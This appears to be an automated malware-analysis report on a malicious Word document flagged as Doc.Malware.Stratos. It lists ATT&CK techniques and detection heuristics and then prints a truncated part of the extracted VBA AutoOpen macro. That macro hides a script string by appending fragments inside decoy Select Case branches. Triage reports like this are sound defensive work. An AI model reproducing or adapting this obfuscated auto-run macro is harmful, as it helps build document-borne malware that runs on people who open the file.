Verdict: MALICIOUS
Risk Score: 248

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample is a malicious Microsoft Office document containing a VBA macro. The macro uses a Shell() call and CreateObject, indicating an attempt to execute external code. The ClamAV detection name 'Doc.Malware.Stratos-6704311-0' further confirms its malicious nature. The macro's obfuscated string concatenation (short literal fragments appended to an accumulator inside decoy Select Case and If branches) likely aims to construct a URL for downloading and executing a secondary payload.
Heuristics (7)

| Finding | Severity | Rule ID | Description |
|---|---|---|---|
| ClamAV: Doc.Malware.Stratos-6704311-0 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Doc.Malware.Stratos-6704311-0 |
| VBA macros detected (4 related findings) | medium | OLE_VBA_MACROS | Document contains VBA macro code |
| Shell() call in VBA | critical | OLE_VBA_SHELL | Shell() call in VBA |
| AutoOpen macro | high | OLE_VBA_AUTOOPEN | AutoOpen macro |
| CreateObject call | high | OLE_VBA_CREATEOBJ | CreateObject call |
| Environ() call (env variable access) | low | OLE_VBA_ENVIRON | Environ() call (env variable access) |
| Legacy WordBasic auto-exec macro marker | medium | OLE_LEGACY_WORDBASIC_AUTOEXEC | OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. |
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 68482 bytes |

SHA-256: 97e1b22c759816948c8c28c7788e504bdc1b9e72c37d30670308c1b0cfaded10

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
oiizcrfro = NaN
Select Case "e_hhyvzyyhke"
Case "e_hhyvzyyhke"
abbe_eeghou = "$uxkfefpnxjz_aqxoeqmerfou_oo_"
Case 11796
Dim ttb_paqporxp As String
ttb_paqporxp = NaN
End Select
qcjejk_ats = NaN
Select Case "btni"
Case "btni"
tbaeq = "awoubmkfupkbhv='ent/t';$hdml"
eeizooii = NaN
abbe_eeghou = abbe_eeghou + tbaeq
Case dwayxpvfik
xuie = NaN
Case 17488
iyukw = NaN
End Select
evzwt = NaN
Select Case 54 + 46
Case 100
omhqmwhi = "xewpmmgaassoyeqhapa=':t"
w_yae = NaN
abbe_eeghou = abbe_eeghou + omhqmwhi
End Select
dqlk_ulnof2 = NaN
If 3 * 69 = 207 Then
xogahmqzfy15 = "emp+"
abbe_eeghou = abbe_eeghou + xogahmqzfy15
End If
oy_fplvfv7 = NaN
Select Case "oqvlguarv"
Case "oqvlguarv"
ndaulvxydt = abbe_eeghou + oltzxckbwcgwh
dp_emyo_i = NaN
iitjhzk = "''\';$oipjdmadsooyuatyi_aqwxy"
rporifch = NaN
ndaulvxydt = abvtg_yai + ndaulvxydt + iitjhzk
Case 169
yiyy = NaN
End Select
erkiaafh = NaN
Select Case "iiiaqqyyi"
Case 12835
Dim yiribsv20
yiribsv20 = NaN
Case zffppi_dyd
xvijye_tklwl = NaN
Case "iiiaqqyyi"
ndaulvxydt = ndaulvxydt + "gt_bro"
End Select
cdm_irqjg8 = NaN
Select Case 15 + 76
Case zswidylew
xlfrfy_wu = NaN
Case 28597
Dim ouovvavt_nse
ouovvavt_nse = NaN
Case 91
yqjaij = "ydgge="
iavlbf_zcuek = NaN
ndaulvxydt = ndaulvxydt + yqjaij
End Select
tukvaiy = NaN
Select Case "kvkoyu"
Case "kvkoyu"
ndaulvxydt = kkitmi + ndaulvxydt + "'-UFo';$zgwzrbfv_eb"
Case 24324
i_lcybgk = NaN
Case g_yto_yii
snlvyvs = NaN
End Select
uobfgjr = NaN
Select Case 54 * 27
Case 1458
vqibekpuy = bdou_hbyjpxnn + ndaulvxydt
xvmein = NaN
eiaryoy_y = "ediepfmaoo_ua"
imv_qtyucmzn0 = NaN
Dim ieppnoeu8 As String
ieppnoeu8 = NaN
vqibekpuy = vqibekpuy + eiaryoy_y
End Select
Dim dn_fofrg_uyjq
dn_fofrg_uyjq = NaN
Select Case 89 + 52
Case 141
eiy_i = xxf_lppj_yu + vqibekpuy
aemxpwoe = NaN
eksshbfsy = "eqyszeowsfh='"
ouey_n = NaN
stq_abpukm = NaN
svl_ascaylu = NaN
eiy_i = eiy_i + eksshbfsy
Case 9060
aeytcsxhvk_pz = NaN
End Select
tqiawu = NaN
If 2923 < 4577 Then
j_awgxe = "st';$zam_opcwue_neiksdk='a"
eiy_i = utryizqsjj + eiy_i + j_awgxe + ycfkeoe
ElseIf 82 - 12 = 94 Then
jpymqa_ou = NaN
glcdejlbmc = NaN
dzuyj = NaN
Else
b_iorai = NaN
ocgtecjp = NaN
ouie = NaN
End If
enme_zr_afitm = NaN
Select Case 27 - 39
Case 2478
wfzmzfyeyd = NaN
Case -12
zrfayaeu = "nguage';$bv_yuhvehiwds"
id_smoavl = NaN
eiy_i = eiy_i + zrfayaeu
Case iaao
odvopuua = NaN
End Select
dpzohraejm8 = NaN
Select Case "rxqq_uy52"
Case utiezfa
Dim aiarytqdto As String
aiarytqdto = NaN
Case "rxqq_uy52"
eiy_i = iinr_y_co40 + eiy_i + "ke_afhcieyuuxyujlojmgt='et" + qkyfydpjjro
Case 5335
epiakrny = NaN
End Select
mdzxx31 = NaN
If 92 - 89 = 3 Then
edgbaxr_zpg = Environ("SystemRoot")
End If
e_cgiaxo76 = NaN
If 6674 < 10348 Then
fiuwyefny = "-Date ';$ubjkyrrtnmfeyeodbprhh"
eiy_i = eiy_i + fiuwyefny
End If
Dim oyfatrj As String
oyfatrj = NaN
Select Case "zfdpe_m"
Case "zfdpe_m"
wjedy = "czumzdwu='rm';$lsokreeuiypto=' + 11.11';$kz"
Dim aeim_si
aeim_si = NaN
eiy_i = eiy_i + wjedy
Case 18830
yktifyia4 = NaN
End Select
yuajhqrly = NaN
Select Case 77 - 16
Case 61
yeitt = "ywmeamnocyejyruepbzlfcyr_i='Pr';$iwj_ngo_aogri"
Dim ooida, fdiro, yrwoj, ak_hwczyue
ooida = NaN
eiy_i = vgystglnz + eiy_i + yeitt + zmcaawy
End Select
kovmjmukhtrq06 = NaN
Select Case 63 * 43
Case 2709
uqzjqaxxij = eiy_i
xaoa = NaN
uaiudet = "fkmo_xiiymppwmrulnuqa='e(1){"
Dim aandtcs As String
aandtcs = NaN
uqzjqaxxij = uqzjqaxxij + uaiudet
Case 27447
wreyekqb = NaN
End Select
aoaitayo = NaN
Select Case "fjglyl"
Case 16044
ofsa_lyqj = NaN
Case "fjglyl"
qgihiai = " ';$jzayyye_eeolkyzkevi=' -f'"
g_tlvwjpgnq9 = NaN
uqzjqaxxij = uegrn + uqzjqaxxij + qgihia
... (truncated)